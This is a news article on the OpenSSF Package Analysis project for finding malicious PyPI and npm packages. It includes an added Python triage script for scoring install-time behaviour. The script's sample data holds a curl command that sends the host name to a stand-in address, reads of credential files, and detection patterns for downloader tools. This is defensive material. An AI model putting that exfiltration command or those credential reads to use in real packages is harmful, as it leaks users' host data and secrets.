New OpenSSF Project Hunts for Malicious Packages in Open Source Repositories

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Package Analysis project, OpenSSF says, aims to identify the behavior and capabilities of open source packages – including files they access, commands they support, and IPs they connect to – and track modifications that could reveal suspicious activities.

“This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem,” OpenSSF says.

Under development for a while, the project went through extensive changes and only recently became useful, the Foundation says.

Package Analysis dynamically investigates packages in popular open source repositories and places the results in a BigQuery table. The project has already identified more than 200 malicious PyPI and npm packages, but most of these were dependency confusion and typosquatting attacks.

The identified packages typically contained a simple script designed to run at install time and send a small amount of information about the host back to its author. Packages of this kind could, however, do far more harm to those who install them.
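The behaviour categories named above (files accessed, commands run, addresses contacted, recorded per package and per phase such as install or import, with changes tracked between versions) lend themselves to a simple triage pass once the dynamic-analysis results are available. The following Python script is an added example written for this article, not code from the Package Analysis project: it scores constructed behaviour records and diffs two versions of the same package. The record layout, field names (`phase`, `files`, `commands`, `sockets`), scoring weights and the sample packages are all assumptions made for the example, not the project's real result schema, and the addresses come from documentation ranges.

```python
"""Triage helper for dynamic-analysis behaviour records (added example)."""
import json
import re
from dataclasses import dataclass, field

# Constructed sample output, loosely modelled on the behaviour categories the
# article lists (files accessed, commands run, addresses contacted). Field names
# are an assumption made for this example, not the project's real result schema.
SAMPLE_RESULTS = r"""[
 {"ecosystem": "pypi", "name": "requests-utils-helper", "version": "0.0.1", "phase": "install",
  "files": ["/etc/hostname", "/etc/passwd", "/home/build/.aws/credentials"],
  "commands": [["python3", "setup.py", "install"],
               ["sh", "-c", "curl -s http://203.0.113.7/c?h=$(hostname)"]],
  "sockets": [{"address": "203.0.113.7", "port": 80}]},
 {"ecosystem": "npm", "name": "tiny-pad", "version": "1.2.0", "phase": "install",
  "files": ["/usr/local/lib/node_modules/tiny-pad/package.json"],
  "commands": [["node", "install.js"]],
  "sockets": []},
 {"ecosystem": "npm", "name": "tiny-pad", "version": "1.3.0", "phase": "install",
  "files": ["/usr/local/lib/node_modules/tiny-pad/package.json", "/home/build/.npmrc"],
  "commands": [["node", "install.js"]],
  "sockets": [{"address": "198.51.100.23", "port": 443}]}
]"""

# Files an install hook has no legitimate reason to read (constructed list).
SENSITIVE_PATHS = re.compile(r"(/etc/passwd|/etc/shadow|/\.ssh/|/\.aws/|/\.npmrc$|/\.pypirc$)")
# Command-line tools commonly used to pull or push data from a script.
DOWNLOADER = re.compile(r"\b(curl|wget|nc|ncat)\b")


@dataclass
class Finding:
    package: str
    version: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points, reason):
        self.score += points
        self.reasons.append(reason)


def score_record(rec):
    """Score one (package, version, phase) record; weights are illustrative."""
    f = Finding(rec["name"], rec["version"])
    if rec["phase"] == "install" and rec["sockets"]:
        addrs = ", ".join(f'{s["address"]}:{s["port"]}' for s in rec["sockets"])
        f.add(3, f"network connection during install: {addrs}")
    for path in rec["files"]:
        if SENSITIVE_PATHS.search(path):
            f.add(3, f"read credential/identity file: {path}")
    for cmd in rec["commands"]:
        line = " ".join(cmd)
        if DOWNLOADER.search(line) and ("http://" in line or "https://" in line):
            f.add(2, f"downloader invoked with a URL: {line}")
    return f


def triage(results_json):
    """Map (name, version, phase) -> Finding for every record in the result set."""
    return {(r["name"], r["version"], r["phase"]): score_record(r)
            for r in json.loads(results_json)}


def needs_review(finding, threshold=3):
    return finding.score >= threshold


def diff_versions(results_json, name, old, new, phase="install"):
    """Behaviour that appeared between two versions of one package in one phase."""
    recs = {(r["name"], r["version"], r["phase"]): r for r in json.loads(results_json)}
    a, b = recs[(name, old, phase)], recs[(name, new, phase)]
    socks = lambda r: {f'{s["address"]}:{s["port"]}' for s in r["sockets"]}
    cmds = lambda r: {" ".join(c) for c in r["commands"]}
    return {
        "new_files": sorted(set(b["files"]) - set(a["files"])),
        "new_sockets": sorted(socks(b) - socks(a)),
        "new_commands": sorted(cmds(b) - cmds(a)),
    }


if __name__ == "__main__":
    for (name, version, phase), f in triage(SAMPLE_RESULTS).items():
        verdict = "REVIEW" if needs_review(f) else "ok"
        print(f"{name}@{version} [{phase}]: {verdict} (score {f.score})")
        for reason in f.reasons:
            print("   -", reason)
    print(diff_versions(SAMPLE_RESULTS, "tiny-pad", "1.2.0", "1.3.0"))
```

The version diff is the part that matters most for the "track modifications" goal: a package that has been quiet for ten releases and then starts reading `.npmrc` and opening a socket during install is exactly the change a reviewer wants surfaced, even if the absolute score stays modest. Weights and path patterns would need tuning per ecosystem before use on real results.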

According to OpenSSF, most of these malicious packages could be the work of security researchers, given that no meaningful data was being exfiltrated and that no attempt was made at disguising the behavior.

The Foundation calls for involvement in advancing the project, to improve behavioral detection, automate result processing, store packages processed for long-term analysis, and improve reliability.

Google, which has long advocated for a safer open source environment and which is a member of OpenSSF, has already announced support for the project.

“This program contributes to a more secure software supply chain and greater trust in open source software. The program also gives insight into the types of malicious packages that are most common at any given time, which can guide decisions about how to better protect the ecosystem,” Google says.

According to the internet giant, the short time that Package Analysis needed to identify malicious projects shows that more should be invested in vetting packages to keep users safe.

“This is a growing space, and having an open standard for reporting would help centralize analysis results and offer consumers a trusted place to assess the packages they’re considering using. Creating an open standard should also foster healthy competition, promote integration, and raise the overall security of open source packages,” Google concluded.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
